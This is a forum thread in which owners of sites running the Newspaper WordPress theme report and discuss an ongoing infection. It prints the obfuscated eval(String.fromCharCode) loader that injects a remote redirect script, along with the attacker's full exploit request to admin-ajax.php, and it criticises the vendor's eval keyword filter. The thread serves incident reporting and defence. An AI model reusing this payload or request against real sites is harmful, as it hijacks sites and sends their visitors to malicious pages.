We’re experiencing a CRITICAL issue across multiple Newspaper websites. Somehow an unauthorized user is able to upload a plugin through admin-ajax.php and inject the redirect script to: Theme Panel -> Custom Code -> Custom Javascript
It’s being posted to tagdiv custom javascript through action=td_ajax_update_panel.
It seems that this is a widespread issue on Newspaper and needs an urgent patch!
This is being reported by others also
https://forum.tagdiv.com/topic/jskryptik-co-trojan-found-in-composer-plugin/#post-457869
The script that’s being injected is:
eval(String.fromCharCode(118,97,114,32,112,115,100,100,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,115,99,114,105,112,116,34,41,59,32,118,97,114,32,119,97,110,116,109,101,101,32,61,32,102,97,108,115,101,59,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,112,115,100,100,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,32,32,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,41,32,123,32,32,32,9,32,105,102,32,40,112,115,100,100,91,105,93,46,105,100,32,61,61,32,34,115,108,101,99,116,114,101,112,111,105,110,116,34,41,123,32,9,9,119,97,110,116,109,101,101,61,116,114,117,101,59,32,9,32,125,32,32,32,125,32,32,125,105,102,40,119,97,110,116,109,101,101,61,61,102,97,108,115,101,41,123,32,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,105,100,61,34,115,108,101,99,116,114,101,112,111,105,110,116,34,59,115,46,115,114,99,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,48,44,49,48,49,44,49,49,57,44,49,49,53,44,52,54,44,49,49,57,44,49,48,49,44,57,55,44,49,49,54,44,49,48,52,44,49,48,49,44,49,49,52,44,49,49,50,44,49,48,56,44,49,48,56,44,49,48,56,44,57,55,44,49,49,54,44,49,48,50,44,49,49,49,44,49,49,52,44,49,48,57,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,57,57,44,49,49,49,44,49,49,55,44,49,49,48,44,49,49,54,44,49,48,49,44,49,49,52,44,49,49,53,44,52,54,44,49,48,54,44,49,49,53,44,54,51,44,49,49,56,44,54,49,44,52,57,44,52,57,44,52,54,44,53,48,44,53,49,41,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,32,125));
This is the action:
135.125.178.115 – – [11/Nov/2022:20:26:49 +0000] “POST /wp-admin/admin-ajax.php HTTP/1.0” 200 1 “https://site-url-removed.com/wp-admin/admin-ajax.php” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0” 0.000 1.588 1.588 200 1.588 action=td_ajax_update_panel&td_magic_token=c8ae20cbbe&td_option%5Btds_custom_javascript%5D=eval%28String.fromCharCode%28118%2C97%2C114%2C32%2C112%2C115%2C100%2C100%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C115%2C99%2C114%2C105%2C112%2C116%2C34%2C41%2C59%2C32%2C118%2C97%2C114%2C32%2C119%2C97%2C110%2C116%2C109%2C101%2C101%2C32%2C61%2C32%2C102%2C97%2C108%2C115%2C101%2C59%2C102%2C111%2C114%2C32%2C40%2C118%2C97%2C114%2C32%2C105%2C32%2C61%2C32%2C48%2C59%2C32%2C105%2C32%2C60%2C32%2C112%2C115%2C100%2C100%2C46%2C108%2C101%2C110%2C103%2C116%2C104%2C59%2C32%2C105%2C43%2C43%2C41%2C32%2C123%2C32%2C32%2C32%2C105%2C102%2C32%2C40%2C112%2C115%2C100%2C100%2C91%2C105%2C93%2C46%2C105%2C100%2C41%2C32%2C123%2C32%2C32%2C32%2C9%2C32%2C105%2C102%2C32%2C40%2C112%2C115%2C100%2C100%2C91%2C105%2C93%2C46%2C105%2C100%2C32%2C61%2C61%2C32%2C34%2C115%2C108%2C101%2C99%2C116%2C114%2C101%2C112%2C111%2C105%2C110%2C116%2C34%2C41%2C123%2C32%2C9%2C9%2C119%2C97%2C110%2C116%2C109%2C101%2C101%2C61%2C116%2C114%2C117%2C101%2C59%2C32%2C9%2C32%2C125%2C32%2C32%2C32%2C125%2C32%2C32%2C125%2C105%2C102%2C40%2C119%2C97%2C110%2C116%2C109%2C101%2C101%2C61%2C61%2C102%2C97%2C108%2C115%2C101%2C41%2C123%2C32%2C9%2C118%2C97%2C114%2C32%2C100%2C61%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C59%2C118%2C97%2C114%2C32%2C115%2C61%2C100%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C115%2C46%2C105%2C100%2C61%2C34%2C115%2C108%2C101%2C99%2C116%2C114%2C101%2C112%2C111%2C105%2C110%2C116%2C34%2C59%2C115%2C46%2C115%2C114%2C99%2C61%2C83%2C116%2C114%2C105%2C110%2C103%2C46%2C102%2C114%2C111%2C109%2C67%2C104%2C97%2C114%2C67%2C111%2C100%2C101%2C40%2C49%2C48%2C52%2C44%2C49%2C49%2C54%2C44%2C49%2C49%2C54%2C44%2C49%2C49%2C50%2C44%2C49%2C49%2C53%2C44%2C53%2C56%2C44%2C52%2C55%2C44%2C52%2C55%2C44%2C49%2C49%2C48%2C44%2C49%2C48%2C49%2C44%2C49%2C49%2C57%2C44%2C49%2C49%2C53%2C44%2C52%2C54%2C44%2C49%2C49%2C57%2C44%2C49%2C48%2C49%2C44%2C57%2C55%2C44%2C49%2C49%2C54%2C44%2C49%2C48%2C52%2C44%2C49%2C48%2C49%2C44%2C49%2C49%2C52%2C44%2C49%2C49%2C50%2C44%2C49%2C48%2C56%2C44%2C49%2C48%2C56%2C44%2C49%2C48%2C56%2C44%2C57%2C55%2C44%2C49%2C49%2C54%2C44%2C49%2C48%2C50%2C44%2C49%2C49%2C49%2C44%2C49%2C49%2C52%2C44%2C49%2C48%2C57%2C44%2C52%2C54%2C44%2C57%2C57%2C44%2C49%2C49%2C49%2C44%2C49%2C48%2C57%2C44%2C52%2C55%2C44%2C57%2C57%2C44%2C49%2C49%2C49%2C44%2C49%2C49%2C55%2C44%2C49%2C49%2C48%2C44%2C49%2C49%2C54%2C44%2C49%2C48%2C49%2C44%2C49%2C49%2C52%2C44%2C49%2C49%2C53%2C44%2C52%2C54%2C44%2C49%2C48%2C54%2C44%2C49%2C49%2C53%2C44%2C54%2C51%2C44%2C49%2C49%2C56%2C44%2C54%2C49%2C44%2C52%2C57%2C44%2C52%2C57%2C44%2C52%2C54%2C44%2C53%2C48%2C44%2C53%2C49%2C41%2C59%2C32%2C105%2C102%2C32%2C40%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C117%2C114%2C114%2C101%2C110%2C116%2C83%2C99%2C114%2C105%2C112%2C116%2C41%2C32%2C123%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C117%2C114%2C114%2C101%2C110%2C116%2C83%2C99%2C114%2C105%2C112%2C116%2C46%2C112%2C97%2C114%2C101%2C110%2C116%2C78%2C111%2C100%2C101%2C46%2C105%2C110%2C115%2C101%2C114%2C116%2C66%2C101%2C102%2C111%2C114%2C101%2C40%2C115%2C44%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C117%2C114%2C114%2C101%2C110%2C116%2C83%2C99%2C114%2C105%2C112%2C116%2C41%2C59%2C125%2C32%2C101%2C108%2C115%2C101%2C32%2C123%2C100%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C39%2C104%2C101%2C97%2C100%2C39%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C115%2C41%2C59%2C125%2C32%2C125%29%29%3B
+1 for me! Found the same code reported by @walshcreative in customer JavaScript
This keeps happening to me over and over. I remove the malware and it gets reuploaded the next day. When people go to my site, they are redirected to a spam website. How can I fix this?
Hi,
That is a code that is injected in the theme – https://ibb.co/Qbs0Xjn is not part of the theme is a malware (weatherplllatform) – https://www.reddit.com/r/Wordpress/comments/xuxb3l/redirection_malware_is_killing_me_its_spread_to_4/
– https://www.myantispyware.com/2022/11/13/go-weatherplllatform-com-pop-up-redirect-virus-removal-guide/
How to Remove Malware & Clean a Hacked WordPress Site
How to Find a Backdoor in a Hacked WordPress Site and Fix It
There are users with different themes, not only Newspaper that are affected by it.
Thank you!
@Calin This is false. I have documented how the unauthorized users are gaining access to WordPress and redirecting the sites. Your patch issued in 12.1.1 is a poor bandaid and easily circumvented. This needs a proper fix.
Okay, I just found your patch, and it is NOT a patch. It’s a bandaid at most. In td-composer/legacy/common/wp_booster/wp-admin/panel/panel_core/td_pannel_data_source.php:610 you have simply added in
// don't allow eval( / String.fromCharCode( as option value if ( td_util::strpos_array( $option_value, array( 'eval(', 'String.fromCharCode(' ) ) !== false ) { $option_value = ''; }
this does not fix the core problem of an unauthenticated user being able to use admin-ajax.php and your td_ajax_update_panel action and td_magic_token to inject anything they want. What if they just change their method and obfuscate their code, it will pass right by this “check” and sites will once again be infected.
Hello,
Indeed, the developers only put a restriction for that code so that it can no longer be set in the theme. Now, if the problem persists, after the theme update and the extra code and files have been checked and cleaned, there may be possible that some files to still be infected. If you want, in this situation if you contact us by email at contact@tagdiv.com and provide wp-admin and FTP access, we will check the files and what else could be infected to make this problem reappear.
Thank you!
I have NOT being infected again, but I can see the same IPS (that I blocked, you can see here and in the other post related with this issue) are trying to repeatedly. My advise is to block them. Both are from OVH SAS hosting, famous for a lot of spam and hacking (I thought to block the entire ip range from this hosting, but finally I didn’t. Anyway I have to say that I have blocked dozens of them).
So, I will ask your developers to find a “more secure” solution to this malware than not to allow writing an “eval string” in theme panel. Think about it, cause it’s a real problem…
Also, If i were you (I mean newspaper support) I will ask to OVH SAS abuse department to look into this ips ranges. If they receive a mail or a call from an important theme developer like you, they will look into the problem with more emphasis than if they receive a mail from a “normal web admin”. Think about it too.
Hi,
Thank you for the suggestion. The problem with this malware (weatherplllatform) is that it is very easily installed in WordPress files, most of the users who contacted us no longer had that code in the theme panel, but it was present in the index.php files and even in wp- includes/js/jquery/jquery.min.js
After I cleaned all the files that I found infected, I asked the users to reset the passwords, especially for the administrators, and to be sure that the permission settings for the WordPress files are correctly set (usually these settings are checked by the host). So far, these users have not reported any problems following these steps.
Now if you say that you have different IPs that force the website, it means that they want to exploit the website and try to use the initial solution to re-infect you.
Thank you!
